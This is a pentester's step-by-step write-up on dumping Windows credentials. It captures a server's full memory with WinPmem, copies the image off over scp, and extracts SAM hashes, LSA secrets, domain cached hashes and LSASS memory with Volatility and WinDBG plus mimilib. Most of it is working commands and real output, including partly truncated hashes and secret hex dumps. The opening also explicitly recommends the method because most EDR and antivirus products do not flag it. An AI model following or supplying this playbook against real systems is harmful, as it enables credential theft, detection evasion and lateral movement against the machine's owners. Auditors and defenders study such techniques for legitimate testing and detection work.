==================================================================================================================================
OS Credential Dumping (Registry+LSASS) using Digital Forensics Tools (WinPmem, Volatility and WinDBG)
==================================================================================================================================

Many digital forensics tools (such as WinPmem, FTK imager and DumpIt) can be used to dump the raw volatile memory of a Windows computer.
Then, other forensics tools like the Volatilty forensics memory framework and WindDBG can be used to extract from the memory dump file 
a variety of credential materials.

In this example, we are going to use the tool WinPmem to dump the entire live memory of a target Windows computer (local admin
rights are required) and then use Volatility and WinDBG to extract various password hashes from the memory dump file.

While this is NOT the most efficent way to dump/extract Windows credentials from a Windows computer, dumping the entire volatile memory 
(instead of only the LSSAS process memory and the registry hives SAM/SYSTEM/SECURITY) is not flagged as malicious by most EDR solutions. 
In addition, digital forensics tools are not flagged as malicious either by antivirus sofwtare.

========================
Tools
========================

> WinPmem is a multi-platform memory acquisition tool from Velocidex.
  URL : https://github.com/Velocidex/WinPmem

> Volatility is an advanced memory forensics framework.
  URLs:
  > Github : 
    + https://github.com/volatilityfoundation/volatility3
    + https://github.com/volatilityfoundation/volatility/
  > Other useful links
    + https://blog.onfvp.com/post/volatility-cheatsheet/
    + https://pwnwithlove.com/fr/articles/cheatsheet_volatility/#procdump-et-memdump
    + https://andreafortuna.org/2017/08/07/volatility-my-own-cheatsheet-part-7-analyze-and-convert-crash-dumps-and-hibernation-files/
    + https://www.diverto.hr/en/blog/2019-11-05-Extracting-Passwords-from-hiberfil-and-memdumps/
    + https://book.hacktricks.xyz/generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet
    + https://mahim-firoj.medium.com/how-to-install-volatility-2-and-how-to-use-it-8d7335e2c26c

> WinDBG is a debugger that can be used to analyze crash dumps, debug live user-mode and kernel-mode code, and examine CPU registers and memory.
  URL: https://learn.microsoft.com/en-us/windows-hardware/drivers/debugger/

> The SIFT Workstation (VM) is a collection of free and open-source incident response and forensic tools designed to perform detailed digital forensic
  examinations in a variety of settings. It can match any current incident response and forensic tool suite. 
  + URL: https://www.sans.org/tools/sift-workstation/

> Mimikatz - Security tool known to extract plaintexts passwords, hash, PIN code and kerberos tickets from memory...
  + URL: https://github.com/gentilkiwi/mimikatz


==========================================
Methodology & PoC/Tests
==========================================

+ STEP 1 - Upload the portable software 'WinPmem' on a target Windows server (for this test/PoC, I used an old Windows server 2016 with ~6Gb of RAM)

------------------------------

+ STEP 2 - Open a CMD prompt as administrator and run 'WinPmem' to dump the volatile memory

			Microsoft Windows [Version 10.0.19045.4170]
			(c) Microsoft Corporation. All rights reserved.
			
			C:\Windows\system32> cd C:\temp 

			C:\temp> winpmem_mini_x64_rc2.exe volatilememory.raw
			
				WinPmem64
				Extracting driver to C:\Users\ADMINI~1\AppData\Local\Temp\1\pme384C.tmp
				Driver Unloaded.
				Loaded Driver C:\Users\ADMINI~1\AppData\Local\Temp\1\pme384C.tmp.
				Deleting C:\Users\ADMINI~1\AppData\Local\Temp\1\pme384C.tmp
				The system time is: 04:40:31
				Will generate a RAW image
				 - buffer_size_: 0x1000
				CR3: 0x00001AA000
				 4 memory ranges:
				Start 0x00001000 - Length 0x0009E000
				Start 0x00100000 - Length 0x00002000
				Start 0x00103000 - Length 0xDFEED000
				Start 0x100000000 - Length 0xA0000000
				max_physical_memory_ 0x1a0000000
				Acquitision mode PTE Remapping
				Padding from 0x00000000 to 0x00001000
				pad
				 - length: 0x1000

				00% 0x00000000 .
				copy_memory
				 - start: 0x1000
				 - end: 0x9f000

				00% 0x00001000 .
				Padding from 0x0009F000 to 0x00100000
				pad
				 - length: 0x61000

				00% 0x0009F000 .
				copy_memory
				 - start: 0x100000
				 - end: 0x102000

				00% 0x00100000 .
				Padding from 0x00102000 to 0x00103000
				pad
				 - length: 0x1000

				00% 0x00102000 .
				copy_memory
				 - start: 0x103000
				 - end: 0xdfff0000

				00% 0x00103000 ..................................................
				12% 0x32103000 ..................................................
				24% 0x64103000 ..................................................
				36% 0x96103000 ..................................................
				48% 0xC8103000 ........................
				Padding from 0xDFFF0000 to 0x100000000
				pad
				 - length: 0x20010000

				53% 0xDFFF0000 .................................
				copy_memory
				 - start: 0x100000000
				 - end: 0x1a0000000

				61% 0x100000000 ..................................................
				73% 0x132000000 ..................................................
				85% 0x164000000 ..................................................
				97% 0x196000000 ..........
				The system time is: 04:40:39
				Driver Unloaded.


			C:\temp> dir volatilememory.raw
			
				 Volume in drive C has no label.
				 Volume Serial Number is 6C7D-B2EF

				 Directory of C:\temp

				04/01/2024  09:40 PM     6,979,321,856 volatilememory.raw
							   1 File(s)  6,979,321,856 bytes
							   0 Dir(s)   3,277,066,240 bytes free

------------------------------

+ STEP 3 - Download the raw memory dump file ("volatilememory.raw") on your auditor/pentester machine 

------------------------------

+ STEP 4 (Option A) - Install 'Volatility v3' on your auditor/pentester machine and verify that the raw memory dump file is not corrupted
                      Github URL : https://github.com/volatilityfoundation/volatility3

		C:\Users\auditor\Documents\Tools\17-DFIR\volatility3-develop> pip3 install -r requirements.txt

		Requirement already satisfied: pefile>=2023.2.7 in c:\users\auditor\appdata\local\packages\pythonsoftwarefoundation.python.3.10_qbz5n2kfra8p0\localcache\local-packages\python310\site-packages (from -r requirements.txt (line 2)) (2023.2.7)
		Collecting yara-python>=3.8.0
		  Downloading yara_python-4.5.0-cp310-cp310-win_amd64.whl (1.7 MB)
			 ---------------------------------------- 1.7/1.7 MB 26.5 MB/s eta 0:00:00
		Requirement already satisfied: capstone>=3.0.5 in c:\users\auditor\appdata\local\packages\pythonsoftwarefoundation.python.3.10_qbz5n2kfra8p0\localcache\local-packages\python310\site-packages (from -r requirements.txt (line 12)) (4.0.2)
		Requirement already satisfied: pycryptodome in c:\users\auditor\appdata\local\packages\pythonsoftwarefoundation.python.3.10_qbz5n2kfra8p0\localcache\local-packages\python310\site-packages (from -r requirements.txt (line 15)) (3.17)
		Collecting leechcorepyc>=2.4.0
		  Downloading leechcorepyc-2.18.0-cp36-abi3-win_amd64.whl (414 kB)
			 ---------------------------------------- 414.2/414.2 kB 13.0 MB/s eta 0:00:00
		Collecting gcsfs>=2023.1.0
		  Downloading gcsfs-2024.3.1-py2.py3-none-any.whl (34 kB)
		Collecting s3fs>=2023.1.0
		<SNIP>


		C:\Users\auditor\Documents\Tools\17-DFIR\volatility3-develop>python vol.py -f "C:\temp\volatilememory.raw" windows.info
		
			Volatility 3 Framework 2.7.0
			Progress:  100.00               PDB scanning finished
			Variable        Value

			Kernel Base     0xf8016c683000
			DTB     0x1aa000
			Symbols file:///C:/Users/auditor/Documents/Tools/17-DFIR/volatility3-develop/volatility3/symbols/windows/ntkrnlmp.pdb/6AEACBAACCDF47E3992ED213F44B6D05-1.json.xz
			Is64Bit True
			IsPAE   False
			layer_name      0 WindowsIntel32e
			memory_layer    1 FileLayer
			KdVersionBlock  0xf8016c977dd8
			Major/Minor     15.14393
			MachineType     34404
			KeNumberProcessors      2
			SystemTime      2024-04-02 04:40:31
			NtSystemRoot    C:\Windows
			NtProductType   NtProductServer
			NtMajorVersion  10
			NtMinorVersion  0
			PE MajorOperatingSystemVersion  10
			PE MinorOperatingSystemVersion  0
			PE Machine      34404
			PE TimeDateStamp        Sat Apr 28 04:31:38 2018

------------------------------

+ STEP 4 (Option B) - Download and set-up the SIFT Workstation VM Appliance that contains Volatility v2 (https://www.sans.org/tools/sift-workstation/)
                      and then use it to verify that the raw memory dump file is not corrupted


     \\Copy the memory dump file to the SIFT Workstation VM Appliance 

      c:\Temp> scp volatilememory.raw sansforensics@192.168.76.129:\tmp\volatilememory.raw
      sansforensics@192.168.76.129's password:
      volatilememory.raw                      100% 6656MB 137.4MB/s   00:48


      \\Log into the SIFT Workstation VM Appliance and then use the Volatility forensics memory framework to verify that the raw memory dump file is not corrupted

      c:\Temp>ssh sansforensics@192.168.76.129
      sansforensics@192.168.76.129's password:
      
      Welcome to Ubuntu 22.04.2 LTS (GNU/Linux 5.15.0-70-generic x86_64)
      <SNIP>
      
      sansforensics@siftworkstation: ~
      $ ls
      Desktop  Documents  Downloads  Music  Pictures  Public  Templates  Videos
      
      sansforensics@siftworkstation: ~
      $ cd /tmp
      
      sansforensics@siftworkstation: /tmp
      $ vol.py -f volatilememory.raw --profile Win2016x64_14393 imageinfo
      Volatility Foundation Volatility Framework 2.6.1
      INFO    : volatility.debug    : Determining profile based on KDBG search...
                Suggested Profile(s) : Win2016x64_14393
                           AS Layer1 : SkipDuplicatesAMD64PagedMemory (Kernel AS)
                           AS Layer2 : FileAddressSpace (/tmp/volatilememory.raw)
                            PAE type : No PAE
                                 DTB : 0x1aa000L
                                KDBG : 0xf8016c9758e0L
                Number of Processors : 2
           Image Type (Service Pack) : 0
                      KPCR for CPU 0 : 0xfffff8016c9c7000L
                      KPCR for CPU 1 : 0xffff998069c00000L
                   KUSER_SHARED_DATA : 0xfffff78000000000L
                 Image date and time : 2024-04-02 04:40:31 UTC+0000
           Image local date and time : 2024-04-01 21:40:31 -0700
      sansforensics@siftworkstation: /tmp

------------------------------

+ STEP 5 (Option A) - use Volatility v3 to extract local windows hashes stored in the registry hives (SAM+SYSTEM) as well as the LSA secrets and domain cache hashes (SECURITY+SYSTEM) 

    \\ Grab common windows hashes (SAM+SYSTEM)

		C:\Users\auditor\Documents\Tools\17-DFIR\volatility3-develop> python vol.py -f "C:\temp\volatilememory.raw" windows.hashdump.Hashdump
		
			Volatility 3 Framework 2.7.0
			Progress:  100.00               PDB scanning finished
			User    	      rid     lmhash  				                        nthash
			Administrator   500     aad3b435b51404eeaad3b435b51404ee        cf3a5525ee9414229e6627<SNIP>
			Guest   	      501     aad3b435b51404eeaad3b435b51404ee        31d6cfe0d16ae931b73c59<SNIP>
			DefaultAccount  503     aad3b435b51404eeaad3b435b51404ee        31d6cfe0d16ae931b73c59<SNIP>
			auditor 	      1015    aad3b435b51404eeaad3b435b51404ee        08d30f5e8206ed215a4373<SNIP>

    \\ Grab LSA secrets

		C:\Users\auditor\Documents\Tools\17-DFIR\volatility3-develop> python vol.py -f "C:\temp\volatilememory.raw" windows.lsadump.Lsadump
		
			Volatility 3 Framework 2.7.0
			Progress:  100.00               PDB scanning finished
			Key     Secret  Hex

			$MACHINE.ACC    ð               W H p , C z @ y B V h p g p # . 5 2 2 R t T 7 e W x 5 j q , 0 ( ( . ) > K s 7 ? X ? , 3 o @ " X v , [ ' " G ^ I 6 ] = m h d / i S h t [ r @ v D D t A h 1 8 H j ? Y p % q ` 6 l J d w < G b / * e 9 P p w : W a m u ^ ' / , 2 d * w F Y P b O l Ì*Þy4a¡ú
			´     f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 57 00 48 00 70 00 2c 00 43 00 7a 00 40 00 79 00 42 00 56 00 68 00 70 00 67 00 70 00 23 00 2e 00 35 00 32 00 32 00 52 00 74 00 54 00 37 00 65 00 57 00 78 00 35 00 6a 00 71 00 2c 00 30 00 28 00 28 00 2e 00 29 00 3e 00 4b 00 73 00 37 00 3f 00 58 00 3f 00 2c 00 33 00 6f 00 40 00 22 00 58 00 76 00 2c 00 5b 00 27 00 22 00 47 00 5e 00 49 00 36 00 5d 00 3d 00 6d 00 68 00 64 00 2f 00 69 00 53 00 68 00 74 00 5b 00 72 00 40 00 76 00 44 00 44 00 74 00 41 00 68 00 31 00 38 00 48 00 6a 00 3f 00 59 00 70 00 25 00 71 00 60 00 36 00 6c 00 4a 00 64 00 77 00 3c 00 47 00 62 00 2f 00 2a 00 65 00 39 00 50 00 70 00 77 00 3a 00 57 00 61 00 6d 00 75 00 5e 00 27 00 2f 00 2c 00 32 00 64 00 2a 00 77 00 46 00 59 00 50 00 62 00 4f 00 6c 00 cc 2a de 79 34 61 96 8a 9b 92 a1 fa 0a 9c b4 9e
			DefaultPassword                 ´Ðmª¦ûàSE ¼¾ïÃ        00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b4 d0 6d aa a6 fb e0 53 45 20 bc 96 be ef 8d c3
			¸→&?AþªUÿÀS=3(↕¤D←¨ìKÇHHKe³b*P        2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 05 60 15 af c7 5e 9d 0d b8 1a 26 3f 41 fe aa 55 ff c0 53 3d 33 28 12 a4 44 1b a8 ec 4b 89 c7 48 48 4b 65 8f b3 62 2a 50 00 00 00 00
			NL$KM   @               ►÷zEìÉ♫♥üÇ▲"ô.B←êÒ‼↑wÙvCì¼îÂú¯¶b»ÌàQ@v↨É×éàÚ▬Øq/{½¼1¡YÙKø«]o¢♀¡¥,2ÛÙ½d¦å♀v        40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 f7 7a 45 ec c9 0e 03 fc c7 1e 22 f4 2e 42 1b ea 90 d2 13 18 77 d9 76 43 ec bc ee c2 fa af 14 62 bb cc 93 e0 51 40 76 17 c9 d7 e9 e0 da 97 16 d8 71 2f 7b bd bc 31 a1 59 d9 4b 81 f8 ab 5d 6f a2 0c a1 a5 9c 2c 32 87 db d9 bd 64 a6 e5 0c 76
			_SC_OracleJobSchedulerXE                        äï¢ß\Ù,↓LÒH,æ7¼°        00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e4 ef a2 df 5c d9 2c 19 4c d2 48 2c e6 37 bc b0
			_SC_OracleOraDB21Home1MTSRecoveryService                        ?Pä.&^#↕Z±æÿ☻xô        00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3f 8f 50 e4 2e 26 5e 23 12 5a b1 e6 ff 02 78 f4
			_SC_OracleOraDB21Home1TNSListener                       u½W×9àyùµ­#1►Ó        00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 75 bd 57 85 d7 39 e0 79 f9 b5 ad 8c 23 31 10 d3
			_SC_OracleServiceXE                     >ßÖålt6∟©Õ÷ùwô        00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3e df d6 e5 6c 74 36 1c a9 d5 92 95 f7 f9 77 f4
			_SC_OracleVssWriterXE                   §t}Jµ¤àxTDjßI▲} 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 15 74 7d 07 4a b5 a4 e0 78 54 44 6a df 49 1e 7d


    \\ Grab domain cache hashes

		C:\Users\auditor\Documents\Tools\17-DFIR\volatility3-develop>python vol.py -f "C:\temp\volatilememory.raw"  windows.cachedump.Cachedump
		
			Volatility 3 Framework 2.7.0
			Progress:  100.00               PDB scanning finished
			Username        	Domain  Domain name     Hash
			john.doe          COMPANY COMPANY.WORK    da043e34b97200ea6de3605ba<SNIP>


------------------------------

+ STEP 5 (Option B) - Use Volatility v2 (and the SIFT VM) to extract local windows hashes stored in the registry hives (SAM+SYSTEM) as well as the LSA secrets and domain cache hashes (SECURITY+SYSTEM) 

     \\ Grab common windows hashes (SAM+SYSTEM)
      
      sansforensics@siftworkstation: /tmp
      $ vol.py -f volatilememory.raw --profile Win2016x64_14393 hashdump
      Volatility Foundation Volatility Framework 2.6.1
      
      Administrator:500:9aadb165dbda01fee0c3b7d620ace312:6c484c716f3b2a77c77d<SNIP>
      Guest:501:1a83470e589c3141b5da9251518ade3e:49e39cee2da72becdc6f15d30eab<SNIP>
      DefaultAccount:503:0c34c0185797e62e2e186d4ce1df229b:9dc6914339045e19871<SNIP>
      auditor:1015:180f65c44819f198a7e987c8fcf978a8:a684c9edbef443cd8d6baac2e<SNIP>

     \\ Grab domain cache hashes

      sansforensics@siftworkstation: /tmp
      $ vol.py -f volatilememory.raw --profile Win2016x64_14393 cachedump
      Volatility Foundation Volatility Framework 2.6.1
      
      john.doe:da043e34b97200ea6de3605b<SNIP>:company:company.work

     \\ Grab LSA secrets
      
      sansforensics@siftworkstation: /tmp
      $ vol.py -f volatilememory.raw --profile Win2016x64_14393 lsadump
      Volatility Foundation Volatility Framework 2.6.1
      
      _SC_OracleJobSchedulerXE
      0x00000000  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
      0x00000010  e4 ef a2 df 5c d9 2c 19 4c d2 48 2c e6 37 bc b0   ....\.,.L.H,.7..
      
      DefaultPassword
      0x00000000  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
      0x00000010  b4 d0 6d aa a6 fb e0 53 45 20 bc 96 be ef 8d c3   ..m....SE.......
      
      _SC_OracleOraDB21Home1TNSListener
      0x00000000  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
      0x00000010  75 bd 57 85 d7 39 e0 79 f9 b5 ad 8c 23 31 10 d3   u.W..9.y....#1..
      
      NL$KM
      0x00000000  40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   @...............
      0x00000010  10 f7 7a 45 ec c9 0e 03 fc c7 1e 22 f4 2e 42 1b   ..zE......."..B.
      0x00000020  ea 90 d2 13 18 77 d9 76 43 ec bc ee c2 fa af 14   .....w.vC.......
      0x00000030  62 bb cc 93 e0 51 40 76 17 c9 d7 e9 e0 da 97 16   b....Q@v........
      0x00000040  d8 71 2f 7b bd bc 31 a1 59 d9 4b 81 f8 ab 5d 6f   .q/{..1.Y.K...]o
      0x00000050  a2 0c a1 a5 9c 2c 32 87 db d9 bd 64 a6 e5 0c 76   .....,2....d...v
      
      _SC_OracleVssWriterXE
      0x00000000  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
      0x00000010  15 74 7d 07 4a b5 a4 e0 78 54 44 6a df 49 1e 7d   .t}.J...xTDj.I.}
      
      _SC_OracleOraDB21Home1MTSRecoveryService
      0x00000000  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
      0x00000010  3f 8f 50 e4 2e 26 5e 23 12 5a b1 e6 ff 02 78 f4   ?.P..&^#.Z....x.
      
      $MACHINE.ACC
      0x00000000  f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
      0x00000010  57 00 48 00 70 00 2c 00 43 00 7a 00 40 00 79 00   W.H.p.,.C.z.@.y.
      0x00000020  42 00 56 00 68 00 70 00 67 00 70 00 23 00 2e 00   B.V.h.p.g.p.#...
      0x00000030  35 00 32 00 32 00 52 00 74 00 54 00 37 00 65 00   5.2.2.R.t.T.7.e.
      0x00000040  57 00 78 00 35 00 6a 00 71 00 2c 00 30 00 28 00   W.x.5.j.q.,.0.(.
      0x00000050  28 00 2e 00 29 00 3e 00 4b 00 73 00 37 00 3f 00   (...).>.K.s.7.?.
      0x00000060  58 00 3f 00 2c 00 33 00 6f 00 40 00 22 00 58 00   X.?.,.3.o.@.".X.
      0x00000070  76 00 2c 00 5b 00 27 00 22 00 47 00 5e 00 49 00   v.,.[.'.".G.^.I.
      0x00000080  36 00 5d 00 3d 00 6d 00 68 00 64 00 2f 00 69 00   6.].=.m.h.d./.i.
      0x00000090  53 00 68 00 74 00 5b 00 72 00 40 00 76 00 44 00   S.h.t.[.r.@.v.D.
      0x000000a0  44 00 74 00 41 00 68 00 31 00 38 00 48 00 6a 00   D.t.A.h.1.8.H.j.
      0x000000b0  3f 00 59 00 70 00 25 00 71 00 60 00 36 00 6c 00   ?.Y.p.%.q.`.6.l.
      0x000000c0  4a 00 64 00 77 00 3c 00 47 00 62 00 2f 00 2a 00   J.d.w.<.G.b./.*.
      0x000000d0  65 00 39 00 50 00 70 00 77 00 3a 00 57 00 61 00   e.9.P.p.w.:.W.a.
      0x000000e0  6d 00 75 00 5e 00 27 00 2f 00 2c 00 32 00 64 00   m.u.^.'./.,.2.d.
      0x000000f0  2a 00 77 00 46 00 59 00 50 00 62 00 4f 00 6c 00   *.w.F.Y.P.b.O.l.
      0x00000100  cc 2a de 79 34 61 96 8a 9b 92 a1 fa 0a 9c b4 9e   .*.y4a..........
      
      DPAPI_SYSTEM
      0x00000000  2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ,...............
      0x00000010  01 00 00 00 05 60 15 af c7 5e 9d 0d b8 1a 26 3f   .....`...^....&?
      0x00000020  41 fe aa 55 ff c0 53 3d 33 28 12 a4 44 1b a8 ec   A..U..S=3(..D...
      0x00000030  4b 89 c7 48 48 4b 65 8f b3 62 2a 50 00 00 00 00   K..HHKe..b*P....
      
      _SC_OracleServiceXE
      0x00000000  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
      0x00000010  3e df d6 e5 6c 74 36 1c a9 d5 92 95 f7 f9 77 f4   >...lt6.......w.
      
      
------------------------------

+ STEP 6 - Try to use Volatility v2 or v3 to dump the password hashes from the LSASS memory 

    Option A - With Volatility v3 we can dump the LSASS process memory but we can't directly extract the password hashes

  		C:\Users\auditor\Documents\Tools\17-DFIR\volatility3-develop> python vol.py -f "C:\temp\volatilememory.raw" windows.pslist
  		
  			Volatility 3 Framework 2.7.0
  			Progress:  100.00               PDB scanning finished
  			PID     PPID    ImageFileName   Offset(V)       Threads Handles SessionId       Wow64   CreateTime      ExitTime        File output
  
  			4       0       System  	0x86882982a700  91      -       N/A     False   2024-04-02 03:48:00.000000      N/A     Disabled
  			256     4       smss.exe        0x86882a071040  2       -       N/A     False   2024-04-02 03:48:00.000000      N/A     Disabled
  			332     324     csrss.exe       0x868829fdb080  10      -       0       False   2024-04-02 03:48:01.000000      N/A     Disabled
  			404     256     smss.exe        0x86882a723080  0       -       1       False   2024-04-02 03:48:01.000000      2024-04-02 03:48:01.000000      Disabled
  			416     324     wininit.exe     0x86882abed080  1       -       0       False   2024-04-02 03:48:01.000000      N/A     Disabled
  			424     404     csrss.exe       0x86882abe8840  10      -       1       False   2024-04-02 03:48:01.000000      N/A     Disabled
  			476     404     winlogon.exe    0x86882abd1080  5       -       1       False   2024-04-02 03:48:01.000000      N/A     Disabled
  			544     416     services.exe    0x86882a72d840  4       -       0       False   2024-04-02 03:48:01.000000      N/A     Disabled
  			552     416     lsass.exe       0x86882ae98700  8       -       0       False   2024-04-02 03:48:01.000000      N/A     Disabled
  			640     544     svchost.exe     0x86882a726840  17      -       0       False   2024-04-02 03:48:01.000000      N/A     Disabled
  			700     544     svchost.exe     0x86882af27080  8       -       0       False   2024-04-02 03:48:02.000000      N/A     Disabled
  			828     544     svchost.exe     0x86882afb1680  58      -       0       False   2024-04-02 03:48:02.000000      N/A     Disabled
  			836     476     dwm.exe 0x86882afb0600  12      -       1       False   2024-04-02 03:48:02.000000      N/A     Disabled
  			860     544     svchost.exe     0x86882af49840  23      -       0       False   2024-04-02 03:48:02.000000      N/A     Disabled
  			968     544     svchost.exe     0x86882af47840  15      -       0       False   2024-04-02 03:48:02.000000      N/A     Disabled
  			996     544     svchost.exe     0x86882af3f840  27      -       0       False   2024-04-02 03:48:02.000000      N/A     Disabled
  			1004    544     svchost.exe     0x86882af3d840  13      -       0       False   2024-04-02 03:48:02.000000      N/A     Disabled
  			1016    544     svchost.exe     0x86882af3b840  19      -       0       False   2024-04-02 03:48:02.000000      N/A     Disabled
  			632     544     svchost.exe     0x86882afe4080  21      -       0       False   2024-04-02 03:48:02.000000      N/A     Disabled
  			1176    544     svchost.exe     0x86882a865080  8       -       0       False   2024-04-02 03:48:02.000000      N/A     Disabled
  			1688    544     svchost.exe     0x86882a873840  4       -       0       False   2024-04-02 03:48:02.000000      N/A     Disabled
  			1784    544     spoolsv.exe     0x86882a9f15c0  9       -       0       False   2024-04-02 03:48:02.000000      N/A     Disabled
  			1876    544     svchost.exe     0x86882ac21400  12      -       0       False   2024-04-02 03:48:03.000000      N/A     Disabled
  			1904    544     svchost.exe     0x86882ac036c0  5       -       0       False   2024-04-02 03:48:03.000000      N/A     Disabled
  			1936    544     svchost.exe     0x86882ae36840  5       -       0       False   2024-04-02 03:48:03.000000      N/A     Disabled
  			1944    544     wlms.exe        0x86882ae35840  2       -       0       False   2024-04-02 03:48:03.000000      N/A     Disabled
  			1956    544     MsMpEng.exe     0x86882ac232c0  25      -       0       False   2024-04-02 03:48:03.000000      N/A     Disabled
  			2104    544     sppsvc.exe      0x86882ad39840  3       -       0       False   2024-04-02 03:48:03.000000      N/A     Disabled
  			2700    544     omtsreco.exe    0x86882b1f7840  4       -       0       False   2024-04-02 03:48:14.000000      N/A     Disabled
  			2708    544     oravssw.exe     0x86882b1c8080  2       -       0       False   2024-04-02 03:48:14.000000      N/A     Disabled
  			2728    544     tnslsnr.exe     0x868829a73740  3       -       0       False   2024-04-02 03:48:14.000000      N/A     Disabled
  			2768    544     oracle.exe      0x86882b1cc740  67      -       0       False   2024-04-02 03:48:14.000000      N/A     Disabled
  			648     544     svchost.exe     0x86882bc29740  9       -       0       False   2024-04-02 03:50:15.000000      N/A     Disabled
  			2744    544     msdtc.exe       0x86882bc78440  9       -       0       False   2024-04-02 03:50:16.000000      N/A     Disabled
  			3964    3916    MpCmdRun.exe    0x868829b80840  6       -       0       False   2024-04-02 04:01:23.000000      N/A     Disabled
  			2340    640     RuntimeBroker.  0x86882aca2080  4       -       1       False   2024-04-02 04:02:28.000000      N/A     Disabled
  			3228    828     sihost.exe      0x86882b598840  9       -       1       False   2024-04-02 04:02:28.000000      N/A     Disabled
  			3208    544     svchost.exe     0x86882b58e840  7       -       1       False   2024-04-02 04:02:28.000000      N/A     Disabled
  			2100    828     taskhostw.exe   0x86882b73f380  11      -       1       False   2024-04-02 04:02:28.000000      N/A     Disabled
  			3452    476     userinit.exe    0x86882b51c840  0       -       1       False   2024-04-02 04:02:28.000000      2024-04-02 04:02:49.000000      Disabled
  			1916    3452    explorer.exe    0x86882b4fa840  45      -       1       False   2024-04-02 04:02:28.000000      N/A     Disabled
  			3672    640     ShellExperienc  0x86882b45c840  28      -       1       False   2024-04-02 04:02:29.000000      N/A     Disabled
  			3740    640     SearchUI.exe    0x868829a96840  15      -       1       False   2024-04-02 04:02:29.000000      N/A     Disabled
  			1544    1472    ServerManager.  0x86882b645080  13      -       1       False   2024-04-02 04:02:30.000000      N/A     Disabled
  			3184    640     SppExtComObj.E  0x86882b5e6600  1       -       0       False   2024-04-02 04:02:30.000000      N/A     Disabled
  			4832    1916    cmd.exe 0x86882bb73600  1       -       1       False   2024-04-02 04:03:36.000000      N/A     Disabled
  			4848    4832    conhost.exe     0x86882b13b080  3       -       1       False   2024-04-02 04:03:36.000000      N/A     Disabled
  			4196    828     taskhostw.exe   0x86882bb93840  5       -       1       False   2024-04-02 04:05:18.000000      N/A     Disabled
  			664     4832    winpmem_mini_x  0x86882ea56080  3       -       1       False   2024-04-02 04:40:31.000000      N/A     Disabled
  
  
  		C:\Users\auditor\Documents\Tools\17-DFIR\volatility3-develop>python vol.py -f "C:\temp\volatilememory.raw" windows.pslist --dump --pid 552
  		
  			Volatility 3 Framework 2.7.0
  			Progress:  100.00               PDB scanning finished
  			PID     PPID    ImageFileName   Offset(V)       Threads Handles SessionId       Wow64   CreateTime      ExitTime        File output
  
  			552     416     lsass.exe       0x86882ae98700  8       -       0       False   2024-04-02 03:48:01.000000      N/A     552.lsass.exe.0x7ff680080000.dmp
  
  
  		C:\Users\auditor\Documents\Tools\17-DFIR\volatility3-develop> dir 552.lsass.exe.0x7ff680080000.dmp
  		
  			 Volume in drive C is Windows
  			 Volume Serial Number is F06E-DC58
  
  			 Directory of C:\Users\auditor\Documents\Tools\17-DFIR\volatility3-develop
  
  			04/01/2024  11:24 PM            69,632 552.lsass.exe.0x7ff680080000.dmp
  						   1 File(s)         69,632 bytes
  						   0 Dir(s)  146,645,336,064 bytes free


    Option B - With Volatility v2, there is a Mimikatz plugin but it did not worked during my tests...

      sansforensics@siftworkstation: /tmp
      $ vol.py -f volatilememory.raw --profile Win2016x64_14393 mimikatz
      Volatility Foundation Volatility Framework 2.6.1
      
      Module   User             Domain           Password
      -------- ---------------- ---------------- ----------------------------------------


      sansforensics@siftworkstation: /tmp
      $ vol.py -f volatilememory.raw --profile Win2016x64_14393 --profile Win2016x64_14393 memdump -p 552 --dump-dir=/tmp/
      Volatility Foundation Volatility Framework 2.6.1
      ************************************************************************
      Writing lsass.exe [   552] to 552.dmp

------------------------------

+ STEP 7 - Use the feature 'raw2dmp' of Volatility v2 to convert the raw memory dump file (volatilememory.raw) to the Winodws crash dump file format (.dmp)

    sansforensics@siftworkstation: /tmp
    $ vol.py -f volatilememory.raw --profile Win2016x64_14393 raw2dmp --output-image=memory.dmp
    Volatility Foundation Volatility Framework 2.6.1
    Writing data (5.00 MB chunks): |....................................................................................................
    ........................................................................................................................................
    ........................................................................................................................................
    ........................................................................................................................................
    ........................................................................................................................................
    ........................................................................................................................................
    ........................................................................................................................................
    ........................................................................................................................................
    ........................................................................................................................................
    ........................................................................................................................................
    .........|
    
    sansforensics@siftworkstation: /tmp
    $ ls -al memory.dmp
    -rw-rw-r-- 1 sansforensics sansforensics 6979330048 Apr  2 01:40 memory.dmp

    sansforensics@siftworkstation: /tmp
    $ exit
    logout
    Connection to 192.168.76.129 closed.

    c:\Temp> scp sansforensics@192.168.76.129:\tmp\memory.dmp C:\Temp\memory.dmp
    sansforensics@192.168.76.129's password:
    memory.dmp                                    100% 6656MB  96.1MB/s   01:09
    
    c:\Temp> dir memory.dmp
     Volume in drive C is Windows
     Volume Serial Number is F06E-DC58
    
     Directory of c:\Temp
    
    04/02/2024  03:48 AM     6,979,330,048 memory.dmp
                   1 File(s)  6,979,330,048 bytes
                   0 Dir(s)  99,450,638,336 bytes free

------------------------------

+ STEP 8 - Use WinDBG (and the Mimikatz mimilib.dll) to extract the Windows password hashes from the LSASS process memory


     > First, start the WinDBG software and load the dump file 'memory.dmp': 
       -> Click on the button "File"
         -> Then click on "Open Crash Dump" file and select the memory file: "C:\Temp\memory.dmp" 

     > Then enter the following commands in the WinDBG prompt:
       + .load wow64exts
       + !wow64exts.sw
       + .load C:\Temp\mimilib.dll
       + !process 0 0 lsass.exe
       + process /r /p ffff86882ae98700      (note: "ffff86882ae98700" is obtained from the previous command)
       + !mimikatz

      
      ************* Preparing the environment for Debugger Extensions Gallery repositories **************
         ExtensionRepository : Implicit
